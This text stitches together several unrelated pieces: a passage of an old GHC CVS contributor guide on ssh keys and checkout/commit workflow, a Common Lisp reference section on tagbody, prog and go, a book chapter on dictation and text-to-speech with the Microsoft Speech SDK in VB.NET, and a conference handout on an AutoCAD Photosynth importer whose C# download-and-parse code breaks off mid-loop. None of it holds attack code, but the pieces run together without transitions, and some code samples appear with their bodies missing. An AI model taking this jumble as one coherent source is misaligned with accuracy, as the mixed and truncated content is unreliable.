passphrase' question, you can either: [Recommended.] Enter a passphrase, which you will quote each time you use CVS. ssh-agent makes this entirely un-tiresome. [Deprecated.] Just hit return (i.e. use an empty passphrase); then you won't need to quote the passphrase when using CVS. The downside is that anyone who can see into your .ssh directory, and thereby get your private key, can mess up the repository. So you must keep the .ssh directory with draconian no-access permissions. Windows users: see the notes in Section 12.3 about ssh wrinkles! Send a message to to the CVS repository administrator (currently Jeff Lewis <jeff@galconn.com>), containing: Your desired user-name. Your .ssh/id_dsa.pub (or .ssh/identity.pub). He will set up your account. Set the following environment variables: $HOME: points to your home directory. This is where CVS will look for its .cvsrc file. $CVS_RSH to ssh [Windows users.] Setting your CVS_RSH to ssh assumes that your CVS client understands how to execute shell script ("#!"s,really), which is what ssh is. This may not be the case on Win32 platforms, so in that case set CVS_RSH to ssh1. $CVSROOT to :ext:your-username @cvs.haskell.org:/home/cvs/root where your-username is your user name on cvs.haskell.org. The CVSROOT environment variable will be recorded in the checked-out tree, so you don't need to set this every time. $CVSEDITOR: bin/gnuclient.exe if you want to use an Emacs buffer for typing in those long commit messages. $SHELL: To use bash as the shell in Emacs, you need to set this to point to bash.exe. Put the following in $HOME/.cvsrc: These are the default options for the specified CVS commands, and represent better defaults than the usual ones. (Feel free to change them.) [Windows users.] Filenames starting with . were illegal in the 8.3 DOS filesystem, but that restriction should have been lifted by now (i.e., you're using VFAT or later filesystems.) If you're still having problems creating it, don't worry; .cvsrc is entirely optional. [Experts.] Once your account is set up, you can get access from other machines without bothering Jeff, thus: Generate a public/private key pair on the new machine. Use ssh to log in to cvs.haskell.org, from your old machine. Add the public key for the new machine to the file $HOME/ssh/authorized_keys on cvs.haskell.org. (authorized_keys2, I think, for Version 2 protocol.) Make sure that the new version of authorized_keys still has 600 file permissions. Make sure you set your CVSROOT environment variable according to either of the remote methods above. The Approved Way to check out a source tree is as follows: At this point you have a new directory called fptools which contains the basic stuff for the fptools suite, including the configuration files and some other junk. [Windows users.] The following messages appear to be harmless: You can call the fptools directory whatever you like, CVS won't mind: NB: after you've read the CVS manual you might be tempted to try instead of checking out fpconfig and then renaming it. But this doesn't work, and will result in checking out the entire repository instead of just the fpconfig bit. The second command here checks out the relevant modules you want to work on. For a GHC build, for instance, you need at least the ghc, hslibs and libraries modules (for a full list of the projects available, see Section 3). Remember that if you do not have happy and/or Alex installed, you need to check them out as well. This is only if you have read-write access to the repository. For anoncvs users, CVS will issue a "read-only repository" error if you try to commit changes. Build the software, if necessary. Unless you're just working on documentation, you'll probably want to build the software in order to test any changes you make. Make changes. Preferably small ones first. Test them. You can see exactly what changes you've made by using the cvs diff command: lists all the changes (using the diff command) in and below the current directory. In emacs, C-c C-v = runs cvs diff on the current buffer and shows you the results. If you changed something in the fptools/libraries subdirectories, also run make html to check if the documentation can be generated successfully, too. Before checking in a change, you need to update your source tree: This pulls in any changes that other people have made, and merges them with yours. If there are any conflicts, CVS will tell you, and you'll have to resolve them before you can check your changes in. The documentation describes what to do in the event of a conflict. It's not always necessary to do a full cvs update before checking in a change, since CVS will always tell you if you try to check in a file that someone else has changed. However, you should still update at regular intervals to avoid making changes that don't work in conjuction with changes that someone else made. Keeping an eye on what goes by on the mailing list can help here. When you're happy that your change isn't going to break anything, check it in. For a one-file change: CVS will then pop up an editor for you to enter a "commit message", this is just a short description of what your change does, and will be kept in the history of the file. If you're using emacs, simply load up the file into a buffer and type C-x C-q, and emacs will prompt for a commit message and then check in the file for you. For a multiple-file change, things are a bit trickier. There are several ways to do this, but this is the way I find easiest. First type the commit message into a temporary file. Then either or, if nothing else has changed in this part of the source tree, where directory is a common parent directory for all your changes, and commit-message is the name of the file containing the commit message. Shortly afterwards, you'll get some mail from the relevant mailing list saying which files changed, and giving the commit message. For a multiple-file change, you should still get only one message. It can be tempting to cvs update just part of a source tree to bring in some changes that someone else has made, or before committing your own changes. This is NOT RECOMMENDED! Quite often changes in one part of the tree are dependent on changes in another part of the tree (the mk/*.mk files are a good example where problems crop up quite often). Having an inconsistent tree is a major cause of headaches. So, to avoid a lot of hassle, follow this recipe for updating your tree: Look at the log file, and fix any conflicts (denoted by a "C" in the first column). New directories may have appeared in the repository; CVS doesn't check these out by default, so to get new directories you have to explicitly doin each project subdirectory. Don't do this at the top level, because then all the projects will be checked out. If you're using multiple build trees, then for every build tree you have pointing at this source tree, you need to update the links in case any new files have appeared: Some files might have been removed, so you need to remove the links pointing to these non-existent files: To be really safe, you should do from the top-level, to update the dependencies and build any changed files. If you want to check out a particular version of GHC, you'll need to know how we tag versions in the repository. The policy (as of 4.04) is: The tree is branched before every major release. The branch tag is ghc-x-xx-branch, where x-xx is the version number of the release with the '.' replaced by a '-'. For example, the 4.04 release lives on ghc-4-04-branch. The release itself is tagged with ghc-x-xx (on the branch). eg. 4.06 is called ghc-4-06. We didn't always follow these guidelines, so to see what tags there are for previous versions, do cvs log on a file that's been around for a while (like fptools/ghc/README). So, to check out a fresh GHC 4.06 tree you would do: As a general rule: commit changes in small units, preferably addressing one issue or implementing a single feature. Provide a descriptive log message so that the repository records exactly which changes were required to implement a given feature/fix a bug. I've found this very useful in the past for finding out when a particular bug was introduced: you can just wind back the CVS tree until the bug disappears. Keep the sources at least *buildable* at any given time. No doubt bugs will creep in, but it's quite easy to ensure that any change made at least leaves the tree in a buildable state. We do nightly builds of GHC to keep an eye on what things work/don't work each day and how we're doing in relation to previous verions. This idea is truely wrecked if the compiler won't build in the first place! To check out extra bits into an already-checked-out tree, use the following procedure. Suppose you have a checked-out fptools tree containing just ghc, and you want to add nofib to it: or: (the -d flag tells update to create a new directory). If you just want part of the nofib suite, you can do This works because nofib is a module in its own right, and spectral is a subdirectory of the nofib module. The path argument to checkout must always start with a module name. There's no equivalent form of this command using update.
http://www.haskell.org/ghc/docs/6.2/html/building/sec-cvs.html
CC-MAIN-2014-15
refinedweb
2,202
72.46
!Converted with LaTeX2HTML 0.6.5 (Tue Nov 15 1994) by Nikos Drakos (nikos@cbl.leeds.ac.uk), CBLU, University of Leeds > Common Lisp the Language, 2nd Edition Lisp implementations since Lisp 1.5 have had what was originally called ``the program feature,'' as if it were impossible to write programs without it! The prog construct allows one to write in an Algol-like or Fortran-like statement-oriented style, using go statements that can refer to tags in the body of the prog. Modern Lisp programming style tends to use prog rather infrequently. The various iteration constructs, such as do, have bodies with the characteristics of a prog. (However, the ability to use go statements within iteration constructs is very seldom called upon in practice.) Three distinct operations are performed by prog: it binds local variables, it permits use of the return statement, and it permits use of the go statement. In Common Lisp, these three operations have been separated into three distinct constructs: let, block, and tagbody. These three constructs may be used independently as building blocks for other types of constructs. [Special Form] tagbody {tag | statement}* The part of a tagbody after the variable list is called the body. An item in the body may be a symbol or an integer, in which case it is called a tag, or an item in the body may be a list, in which case it is called a statement. Each element of the body is processed from left to right. A tag is ignored; a statement is evaluated, and its results are discarded. If the end of the body is reached, the tagbody returns nil. If (go tag) is evaluated, control jumps to the part of the body labelled with the tag. The scope of the tags established by a tagbody is lexical, and the extent is dynamic. Once a tagbody construct has been exited, it is no longer legal to go to a tag in its body. It is permissible for a go to jump to a tagbody that is not the innermost tagbody construct containing that go; the tags established by a tagbody will only shadow other tags of like name. The lexical scoping of the go targets named by tags is fully general and has consequences that may be surprising to users and implementors of other Lisp systems. For example, the go in the following example actually does work in Common Lisp as one might expect: (tagbody (catch 'stuff (mapcar #'(lambda (x) (if (numberp x) (hairyfun x) (go lose))) items)) (return) lose (error "I lost big!")) Depending on the situation, a go in Common Lisp does not necessarily correspond to a simple machine ``jump'' instruction. A go can break up catchers if necessary to get to the target. It is possible for a ``closure'' created by function for a lambda-expression to refer to a go target as long as the tag is lexically apparent. See chapter 3 for an elaborate example of this. There are some holes in this specification (and that of go) that leave some room for interpretation. For example, there is no explicit prohibition against the same tag appearing more than once in the same tagbody body. Every implementation I know of will complain in the compiler, if not in the interpreter, if there is a go to such a duplicated tag; but some implementors take the position that duplicate tags are permitted provided there is no go to such a tag. (``If a tree falls in the forest, and there is no one there to hear it, then no one needs to yell `Timber!''') Also, some implementations allow objects other than symbols, integers, and lists in the body and typically ignore them. Consequently, some programmers use redundant tags such as - for formatting purposes, and strings as comments: (defun dining-philosopher (j) (tagbody - think (unless (hungry) (go think)) - "Can't eat without chopsticks." (snatch (chopstick j)) (snatch (chopstick (mod (+ j 1) 5))) - eat (when (hungry) (mapc #'gobble-down '(twice-cooked-pork kung-pao-chi-ding wu-dip-har orange-flavor-beef two-side-yellow-noodles twinkies)) (go eat)) - "Can't think with my neighbors' stomachs rumbling." (relinquish (chopstick j)) (relinquish (chopstick (mod (+ j 1) 5))) - (if (happy) (go think) (become insurance-salesman)))) In certain implementations of Common Lisp they get away with it. Others abhor what they view as an abuse of unintended ambiguity in the language specification. For maximum portability, I advise users to steer clear of these issues. Similarly, it is best to avoid using nil as a tag, even though it is a symbol, because a few implementations treat nil as a list to be executed. To be extra careful, avoid calling from within a tagbody a macro whose expansion might not be a non-nil list; wrap such a call in (progn ...), or rewrite the macro to return (progn ...) if possible. [Macro] prog ({var | (var [init])}*) {declaration}* {tag | statement}* prog* ({var | (var [init])}*) {declaration}* {tag | statement}* The prog construct is a synthesis of let, block, and tagbody, allowing bound variables and the use of return and go within a single construct. A typical prog construct looks like this: (prog (var1 var2 (var3 init3) var4 (var5 init5)) {declaration}* statement1 tag1 statement2 statement3 statement4 tag2 statement5 ... ) The list after the keyword prog is a set of specifications for binding var1, var2, etc., which are temporary variables bound locally to the prog. This list is processed exactly as the list in a let statement: first all the init forms are evaluated from left to right (where nil is used for any omitted init form), and then the variables are all bound in parallel to the respective results. Any declaration appearing in the prog is used as if appearing at the top of the let body. The body of the prog is executed as if it were a tagbody construct; the go statement may be used to transfer control to a tag. A prog implicitly establishes a block named nil around the entire prog construct, so that return may be used at any time to exit from the prog construct. Here is a fine example of what can be done with prog: ))) which is accomplished somewhat more perspicuously by )))) The prog construct may be explained in terms of the simpler constructs block, let, and tagbody as follows: (prog variable-list {declaration}* . body) == (block nil (let variable-list {declaration}* (tagbody . body))) The prog* special form is almost the same as prog. The only difference is that the binding and initialization of the temporary variables is done sequentially, so that the init form for each one can use the values of previous ones. Therefore prog* is to prog as let* is to let. For example, (prog* ((y z) (x (car y))) (return x)) returns the car of the value of z. I haven't seen prog used very much in the last several years. Apparently splitting it into functional constituents (let, block, tagbody) has been a success. Common Lisp programmers now tend to use whichever specific construct is appropriate. [Special Form] go tag The (go tag) special form is used to do a ``go to'' within a tagbody construct. The tag must be a symbol or an integer; the tag is not evaluated. go transfers control to the point in the body labelled by a tag eql to the one given. If there is no such tag in the body, the bodies of lexically containing tagbody constructs (if any) are examined as well. It is an error if there is no matching tag lexically visible to the point of the go. The go form does not ever return a value. As a matter of style, it is recommended that the user think twice before using a go. Most purposes of go can be accomplished with one of the iteration primitives, nested conditional forms, or return-from. If the use of go seems to be unavoidable, perhaps the control structure implemented by go should be packaged as a macro definition.
http://sandbox.mc.edu/~bennet/cs231/cltl/clm/node91.html
CC-MAIN-2018-05
refinedweb
1,335
59.64
I made a texture for this as a helmet and item, saved as attachments here: - - NebulaeDragon - Registered Member - Member for 6 years, 8 months, and 2 days Last active Wed, Oct, 18 2017 13:47:47 - 0 Followers - 5 Total Posts - 0 Thanks - Feb 27, 2016NebulaeDragon posted a message on [Request]Can someone create a mask for me? Or a good texturePosted in: Requests / Ideas For Mods 0NebulaeDragon posted a message on Mod Idea: Mobs have higher health and damage the further from spawn they arePosted in: Requests / Ideas For Mods If you've used many mods or modpacks that add more equipment or more ways to become more powerful, you may have found that mobs eventually become so weak compared to you that it would be practically impossible for them to ever kill you. At this point, only mobs or bosses added by mods could be a challenge, but after killing them you will almost always get better equipment from them that makes them much easier. You could try installing some more mods that make mobs more powerful, but that usually just makes the beginning of the game much harder while making the endgame only slightly more difficult. The problem is that, while you progress, mob difficulty is constantly lowering relative to you and the only time it goes up is in other dimensions (and with mods those dimensions usually give you even more ways to become powerful). My idea for a solution to this problem is having a mod that makes enemies spawn with more health and damage the further from spawn they are. This would let the start of the game not be too difficult unless you wanted to go further from spawn and fight more powerful mobs, and when you get much better equipment you can just go really far from spawn so combat stays challenging. I have searched for a mod that does this, but the only things like this I could find where some Bukkit plugins from 2 or 3 years ago, and apparently you can't download Bukkit anymore. So would anyone want to make a mod that causes mobs to have their maxHealth and attackDamage multiplied based on how many blocks away from spawn they spawned? EDIT: I found a mod that does this! 0NebulaeDragon posted a message on A mod that lets you keep your inventory on death, but still lose expPosted in: Requests / Ideas For Mods I usually have keepInventory set to true because I don't like losing all my items when I die, but then there isn't really a reason to avoid dying other than not having to travel all the way back to where you died. This gave me the idea to install the More Health Enchanted mod, and change the config so I start with 5 hearts and go back to 5 hearts when I die, and have to level up to get 10 hearts again. However, because keepInventory is on I would respawn with all the exp I had, and when my level would update I'd instantly be back at 10 hearts. I think there's a mod that already allows something like this, but it includes a lot of other things and causes my game to crash. 0NebulaeDragon posted a message on How to set a resource pack to a serverPosted in: Resource Pack Help But how do you find a source link with .zip at the end? 0NebulaeDragon posted a message on 1.12 - Custom Loot TablesPosted in: Commands, Command Blocks and Functions What do you mean by namespace? If I named a folder "Loot" and in that folder I had a folder named "chests" that contained the .json file for a custom loot table called "dogfood", I think I'd have to use a command like this: /blockdata ~ ~-1 ~ {LootTable:"Loot:chests/dogfood"} to set that as the loot table for a chest, but I don't know where to put the folder named "Loot". - To post a comment, please login. 0
https://www.minecraftforum.net/members/NebulaeDragon/posts
CC-MAIN-2022-27
refinedweb
672
56.63
Download CD Content In the previous chapter, we built our second application with Microsoft Agent. The application took advantage of speech recognition technologies available as an engine for the Agent characters. In this chapter, we continue on a similar path, but this time, we use the Microsoft Speech SDK. When the Microsoft Research Speech Technology Group released the SAPI 5.0 SDK, it contained one big omission, a COM interface for VB programmers. By the time version 5.1 was released, they had fixed this shortcoming. It's important not to confuse the SAPI 5.1 SDK with the .NET Speech SDK. The .NET Speech SDK should only be used for Web-based applications (Web Forms), whereas the SAPI SDK was intended for Windows Forms applications. The SAPI speech recognition engine differs greatly from the Agent offering. For starters, the engine is advanced enough to allow you to dictate directly into an application. You could dictate letters or memos without the need to make many corrections afterwards. The engine even works very well without extensive training. You can download the Speech SDK from, and remember that we need to use the version 5.1 Speech SDK in lieu of the .NET Speech SDK because it is for Windows-based applications rather than the Web-centric .NET version. Like Agent, the SAPI speech recognition engine is also very easy to use. We can begin the application by creating a new Windows Forms application. The next step is to add a reference to the Microsoft Speech Object Library. You can add the library using the Project menu, selecting Add Reference, clicking on the COM tab, and then choosing the library from the list. The user interface for our application will be very simple and will consist of four buttons, a status bar, and a text box. You can use the properties listed in Table 21.1 and refer to Figure 21.1 for the arrangement of the controls. Figure 21.1: The completed GUI for our application. With the brief overview and GUI out of the way, we can write some code for our application. We begin the code with the Imports statements for SpeechLib and System.Threading: Imports SpeechLib Imports System.Threading The SpeechLib was added as a reference earlier in the project and probably comes as no surprise. The System.Threading namespace is something that we have yet to touch on. In simple terms, threading is the ability to run different pieces of code (methods) at the same time. You can even think of it as multitasking within a single application. Although that sounds good, a computer can't do multiple things at the same time. Therefore, in order for threading to work, different tasks and threads have to share processing resources. It is the job of the operating system to assign the time to the different tasks. As a real-world example, take a look at Microsoft Internet Explorer. As you navigate a Web site, items are being downloaded. As busy as the application is retrieving information, you can still perform other tasks, such as move the window around, resize it, and even open another window. This is because all of the tasks are running on different threads. We don't have much of a need in the way of threads for this application. Really, we only need to use a constant called Timeout.Infinite, which is used to specify an infinite waiting period. We use the constant in this application when we save the text-to-speech output of our application to a WAV file. Our next step is to Dim some variables that we'll need to use throughout the application. These variables include RecoContext, Grammar, m_BrecoRunning, and m_cChars. Dim WithEvents RecoContext As SpeechLib.SpSharedRecoContext Dim Grammar As SpeechLib.ISpeechRecoGrammar Dim m_bRecoRunning As Boolean Dim m_cChars As Short We use the Form_Load event to initialize some of the controls and variables. First, we set txtSpeech (or a replacement Ink control) to an empty string value. This effectively removes any text it currently has, so that anything we dictate into the application is visible by itself. Next, we set the state of the recognition to False. We'll actually create a Sub routine for this, but for now, you can simply type the line that calls the routing. Additionally, we set m_cChars equal to 0 and the Text property of StatusBar1 equal to an empty string. Here is the code: txtSpeech.Text = "" SetState(False) m_cChars = 0 StatusBar1.Text = "" The next step is to create the SetState Sub routine. This Sub allows us to turn the recognition on and off quickly and effectively throughout the use of the application. We'll begin by passing a Boolean value into the Sub, because the True and False values are an easy way to set the current state of the recognition. If you pass a True value, recognition is working, whereas False obviously turns it off. The value being passed in will be known as bNewState by the Sub. We can use bNewState directly to set the m_bRecoRunning variable. After setting the value, we can set the enabled property of btnRecognize equal to the opposite of m_bRecoRunning. Therefore, if the engine is running, the button is not enabled. Additionally, if the engine is not running, the button is enabled. The last step in the Sub is to use m_bRecoRunning to set the enabled property of btnStopRecognize. This time, however, we can use the actual value as we only want btnStopRecognize enabled when the engine is running and we certainly don't have a need to click on it when it is not running. Here is the entire procedure: Private Sub SetState(ByVal bNewState As Boolean) m_bRecoRunning = bNewState btnRecognize.Enabled = Not m_bRecoRunning btnStopRecognize.Enabled = m_bRecoRunning End Sub Let's now look at the events that are triggered when each of the four buttons are clicked as well as the RecoContext event, which occurs when m_bRecoRunning is enabled and some speech is recognized. We'll start with the btnRecognize_click event. The btnRecognize_click event begins with initializing the Recognition Context object and the Grammar object. We will then use the SetStatus Sub procedure, and by passing a value of True, we set the state of the recognition to True. Lastly, we set the Text property of StatusBar1 to "SAPI ready for dictation...". Private Sub btnRecognize_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnRecognize.Click If (RecoContext Is Nothing) Then StatusBar1.Text = "Initializing SAPI reco..." RecoContext = New SpeechLib.SpSharedRecoContext() Grammar = RecoContext.CreateGrammar(1) Grammar.DictationLoad() End If Grammar.DictationSetState(SpeechLib.SpeechRuleState.SGDSActive) SetState(True) StatusBar1.Text = "SAPI ready for dictation..." End Sub This is the first time in our application that the state of the recognition has been set to True, so it seems like an appropriate time to look at the RecoContext Recognition method. You can create this procedure by using the Class Name and Method Name drop-down lists and choosing RecoContext and Recognition, respectively. We begin by setting the StatusBar1 Text property to "Recognizing...". This gives an update to our user that something is actually occurring in our application. If you did not update the user on the status, it might appear to them that the application was not working correctly. Most of the remaining portion of code for this procedure is used to add the recognized text to the text box. When we append the text to the text box, we add a space so that the sentences do not run together. Once finished, we set the StatusBar1 Text property to "Speech recognized successfully...SAPI enabled" so the user knows he can continue dictation if he wants. Here is the code: Private Sub RecoContext_Recognition(ByVal StreamNumber As Integer, ByVal StreamPosition As Object, ByVal RecognitionType As SpeechLib.SpeechRecognitionType, ByVal Result As SpeechLib.ISpeechRecoResult) Handles RecoContext.Recognition Dim strText As String strText = Result.PhraseInfo.GetText StatusBar1.Text = "Recognizing..." txtSpeech.SelectionStart = m_cChars txtSpeech.SelectedText = strText & " " m_cChars = m_cChars + 1 + Len(strText) StatusBar1.Text = "Speech recognized successfully...SAPI enabled" End Sub Now that we are dictating into the application, we also need a way to turn the dictation process off. This job is taken care of with btnStopRecognize. When we click the button, we want to set the grammar state to inactive, use SetState to set the recognition to False, and then update the StatusBar1 to reflect these changes. Here is the code: Private Sub btnStopRecognize_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnStopRecognize.Click Grammar.DictationSetState(SpeechLib.SpeechRuleState.SGDSInactive) SetState(False) StatusBar1.Text = "SAPI Disabled" End Sub Dictation into the application is now taken care of completely, although we have a few additional features we want to add to our application. In addition to speech recognition, SAPI allows us to perform Text to Speech similarly to Microsoft Agent. We have two remaining buttons on our form, and their click events allow us to read back the text audibly, or, if we choose, we can save the content of the text box to a WAV file so that it could be played later. Let's handle btnSpeak first because it is the less complicated of the two and covers part of what occurs in btnSpeakToFile. We begin by creating a variable called Voice and setting it to SpVoice. We can then use the Speak method of Voice to convert the text contents of the txtSpeech text box to speech. Lastly, we update StatusBar1 to "SAPI disabled...". Here is the code: Private Sub btnSpeak_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSpeak.Click Dim Voice As SpVoice Voice = New SpVoice() Voice.Speak(txtSpeech.Text, SpeechLib.SpeechVoiceSpeakFlags.SVSFlagsAsync) StatusBar1.Text = "SAPI disabled..." End Sub Like btnSpeak, btnSpeakToFile begins with initializing the Voice variable. Next, we set the Text property of StatusBar1 to "Saving to file...". We then proceed to create a new SaveFileDialog and create a filter for saving the contents as a WAV file. Once we have a filename, we then Dim spFileMode and spFileStream so that we know how to save the file. We then use the Speak method of Voice, but instead of audibly hearing the speech, it is saved into the WAV file we create. Lastly, we close the stream and then set the StatusBar1 Text property to "SAPI disabled...". Here is the code: Private Sub btnSpeakToFile_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSpeakToFile.Click Dim Voice As SpVoice Voice = New SpVoice() StatusBar1.Text = "Saving to file..." Dim sfd As SaveFileDialog = New SaveFileDialog() sfd.Filter = "All files (*.*)|*.*|wav files (*.wav)|*.wav" sfd.Title = "Save to a wave file" sfd.FilterIndex = 2 sfd.RestoreDirectory = True If sfd.ShowDialog() = DialogResult.OK Then Dim SpFileMode As SpeechStreamFileMode = SpeechStreamFileMode.SSFMCreateForWrite Dim SpFileStream As SpFileStream = New SpFileStream() SpFileStream.Open(sfd.FileName, SpFileMode, False) Voice.AudioOutputStream = SpFileStream Voice.Speak(txtSpeech.Text, SpeechLib.SpeechVoiceSpeakFlags.SVSFlagsAsync) Voice.WaitUntilDone(Timeout.Infinite) SpFileStream.Close() End If StatusBar1.Text = "SAPI Disabled..." End Sub You are now in position to test the application after you save it. When you start it, the screen should look like Figure 21.2. Figure 21.2: Your application should be similar on startup. You can now try the various buttons to see how each of them performs. When you test the Speak to File button, you can test the resulting WAV file by double-clicking it. The application that has been set to open WAV files (by default, this is Media Player) opens and plays the file similarly to Figure 21.3. Figure 21.3: The file being played back in Media Player. In this chapter, we built the first of two programs based on the SAPI 5.1 Speech SDK. We used the built-in grammar as we tested the speech recognition capabilities. Although it is certainly very good, there are certain types of applications that can benefit from more precise recognition. This brings us to Chapter 22, Custom Grammars for Speech Recognition, in which we build an application that performs basic arithmetic. The numbers and operations are all completed by speech recognition using a custom grammar.
https://flylib.com/books/en/2.187.1/speech_input_with_sapi.html
CC-MAIN-2018-09
refinedweb
2,014
59.09
This handout is for the companion class to the one whose handout formed my last post. While that class was user-focused, this one, “CP322-2 - Integrate F# into Your C# or VB.NET Application for an 8x Performance Boost”, is more developer-focused and takes the hood off the implementation of the BrowsePhotosynth application. The code for this special version of the application – which imports synchronously via C# and synchronously/asynchronously via F# – is available here for download. Introduction This class takes a look at the implementation of BrowsePhotosynth for AutoCAD, the ADN Plugin of the Month from October 2010 and the application showcased in the companion, user-oriented class, “AC427-4 - Point Clouds on a Shoestring”. We’ll look at some of the design decisions behind the application, particularly with respect to the use of F# to help download and process the various files making up a Photosynth’s point cloud. To understand more about the purpose of this application, it’s first worth taking a look at the handout to the companion class. In a nutshell, the BrowsePhotosynth application allows users of AutoCAD 2011 (and, in due course, above) to browse the contents of the Photosynth web-service and easily bring down point clouds corresponding to the “synths” hosted on the site. The System Architecture Let’s take a look at the overall architecture of the system before diving into the individual components. Here we can see a few DLLs are hosted by AutoCAD: the primary one is called ADNPlugin-BrowsePhotosynth.dll and implements a number of commands, the most important of which are BROWSEPS and IMPORTPS. It is this DLL that needs to be NETLOADed or demand-loaded into AutoCAD for the BrowsePhotosynth application to work properly. Users will call BROWSEPS, which causes the UI component - ADNPlugin-PhotosynthBrowser.exe – to be launched to present a dialog user to the user. This dialog will – in turn – call the IMPORTPS back in AutoCAD to download, process and import the point cloud data. It’s during this processing phase that the main Importer may choose to use a separate component, the Processor DLL (ADNPlugin-PhotosynthProcessor.dll). This functionality has been packaged as a separate component as it was written in F#. The User Interface As mentioned above, the main entry-point into the application is the BROWSEPS command, which launches a WPF dialog implemented in the “Browser” project of the main solution. This project actually builds an EXE (ADNPlugin-PhotosynthBrowser.exe), rather than a DLL, which is interesting for a few reasons: - Isolation from AutoCAD - Portability to other products - As we support point clouds across more of our products, having an independent GUI component will simplify migration to support them - Can even by used standalone - As the browser does not depend on AutoCAD, it can also be executed separately, allowing the user to build up the lost of point clouds to import before even launching AutoCAD The overriding reason for this design was the first: the ability to run as 32-bit even on 64-bit OSs was important as we make use of a 3rd party component, csExWb2, which is currently only available as a 32-bit version. This component also causes an error when the hosting dialog closes (which you will see if you launch the EXE separately, as described in the third point above). It’s also for this reason – to isolate the user from this error, which cause AutoCAD stability problems when it happened in an in-process component – that the dialog is hosted in a separate application. The main plugin launches and maintains an instance of the dialog’s process: when the dialog is closed it is effectively hidden and the process gets terminated at an appropriate point later on, thus avoiding the error. If AutoCAD gets terminated unexpectedly (such as via the debugger), there may be a stray process which is detected and terminated (should the user request it) when the application is next used. So why used a 3rd party component, if it causes all this problems? The component implements a web-browser control that reports the HTTP traffic generated by its contents to the application. This allows us to detect when the user has visited a page containing a synth, as the embedded Silverlight control requests a file named “points_0_0.bin”, the file containing the point cloud’s first 5,000 points. There may be other browser controls available that implement this capability, but I unfortunately haven’t found any. As the application detects point clouds being accessed, they get added to the list on the right of the dialog using an image that is also pulled down from the Photosynth server. The original UI was implemented using WinForms, but the benefits of using WPF quickly became apparent as additional UI features – such as the ability to resize the items using a slider – became desirable. It’s worth taking a look at some of the techniques used in the WPF application – here are some of them: - Our list of point clouds is bound to an ObservableCollection<> of objects containing the information we care about - We had to implement INotifyPropertyChanged for this to work properly - We add items to this list when our HTTP event is fired, but as we’re not executing on the UI thread, at that point, we need to request the list to be updated via Dispatcher.Invoke() - We use a WindowInteropHelper to make AutoCAD’s main window the parent of the EXE - This gives a modal – rather than modeless – feel to the UI - The display of our listbox has been customized significantly - It selects on hover - It has a custom gradient fill to better fit the look & feel of the Photosynth site For additional information regarding the development of the WPF UI for this application, see this blog post. Now on to how the UI communicates with AutoCAD. To avoid any dependency on AutoCAD from the WPF application, it simply uses Windows messages to launch the IMPORTPS command. This decoupling is healthy for portability reasons but also to make sure the command gets launched cleanly: it is considered best practice to launch commands in AutoCAD from a modeless UI, whether using AutoCAD’s SendStringToExecute() API or using Win32’s SendMessage(). The Import Process The IMPORTPS command – which is actually the real heart of the application – has the following process: It’s worth noting that the application doesn’t actually make much use of AutoCAD’s APIs: it uses SendStringToExecute() to fire off standard commands to index and attach the point cloud, but aside from that the plugin’s code is also fairly standalone in nature. We’re most interested with the left-hand part of this process, where we bring the .bin files down from the Photosynth server and process them into a single text file. Let’s start by understanding why there are all these files to download, process and combine. Photosynth’s web service stores point clouds in chunks of 5,000 points. So if we have a point cloud comprising 26,000 points it will be stored in 6 files named points_0_0.bin, points_0_1.bin, points_0_2.bin, points_0_3.bin, points_0_4.bin and points_0_5.bin, each containing 5,000 points, apart from the last which will only contain 1,000. This has most probably been done to enable the Silverlight control to stream down sections of the point cloud selectively/progressively. There may be additional point clouds (contained in files such as points_2_0.bin, etc.), but as these do not share a coordinate system with the primary point cloud, including them only proves confusing. These could easily be downloaded and combined into separate PCG files inside AutoCAD, but this has been left as an exercise for the user, as the merit of doing so seems somewhat dubious. Now onto the main purpose of this class. :-) Given the unordered nature of point clouds – at least from AutoCAD’s perspective – this presents us with a really interesting optimization opportunity: rather than downloading and processing the files sequentially via synchronous API calls, we can choose to perform this work asynchronously. Asynchronous programming is a hot topic, right now, and currently a key benefit F# brings over VB.NET and C# – hence the somewhat provocative title for this class. That said, Anders Hejlsberg’s recent announcement at PDC 2010 regarding the addition of asynchronous programming support to VB.NET and C# – which can be used right now with the Visual Studio Async CTP – will definitely enable this kind of functionality from your preferred .NET language, over time. Also worth checking out is the accompanying Channel 9 interview. Anders’ demo shows very eloquently why the current mode of making asynchronous calls from VB.NET and C# is inadequate. While the Parallel Extensions for .NET – provided in .NET 4.0 – was a great addition for simplifying the management of multiple tasks, strong support for asynchronous calls was missing. This area is still a key advantage of using F#: its elegant Asynchronous Workflows feature makes the description and execution of asynchronous tasks really easy. Before we look at applying Asynchronous Workflows to this problem, let’s see a standard synchronous approach in C#: using Autodesk.AutoCAD.DatabaseServices; using Autodesk.AutoCAD.EditorInput; using Autodesk.AutoCAD.Runtime; using System.Net; using System.IO; using System; namespace PhotosynthProcSyncCs { public class PointCloudProcessor { Editor _ed; ProgressMeter _pm; string _localPath; public PointCloudProcessor( Editor ed, ProgressMeter pm, string localPath ) { _ed = ed; _pm = pm; _localPath = localPath; } public long ProcessPointCloud( string path, int[] dims, string txtPath ) { // Counter for the total number of points long totalPoints = 0; // Create our intermediate text file in the temp folder FileInfo t = new FileInfo(txtPath); StreamWriter sw = t.CreateText(); using (sw) { // We'll use a web client to download each .bin file WebClient wc = new WebClient(); using (wc) { for (int maj=0; maj < dims.Length; maj++) { for (int min=0; min < dims[maj]; min++) { // Loop for each .bin file string root = maj.ToString() + "_" + min.ToString() + ".bin"; string src = path + root; string loc = _localPath + root; try { wc.DownloadFile(src, loc); } catch { return 0; } if (File.Exists(loc)) { // Open our binary file for reading BinaryReader br = new BinaryReader( File.Open(loc, FileMode.Open) ); using (br) { try { // First information is the file version // (for now we support version 1.0 only) ushort majVer = ReadBigEndianShort(br); ushort minVer = ReadBigEndianShort(br); if (majVer != 1 || minVer != 0) { _ed.WriteMessage( "\nCannot read a Photosynth point cloud " + "of this version ({0}.{1}).", majVer, minVer ); return 0; } // Clear some header bytes we don't care about int n = ReadCompressedInt(br); for (int i = 0; i < n; i++) { int m = ReadCompressedInt(br); for (int j = 0; j < m; j++) { ReadCompressedInt(br); ReadCompressedInt(br); } } // Find out the number of points in the file int numPoints = ReadCompressedInt(br); totalPoints += numPoints; _ed.WriteMessage( "\nProcessed points_{0} containing {1} points.", root, numPoints ); for (int k = 0; k < numPoints; k++) { // Read our 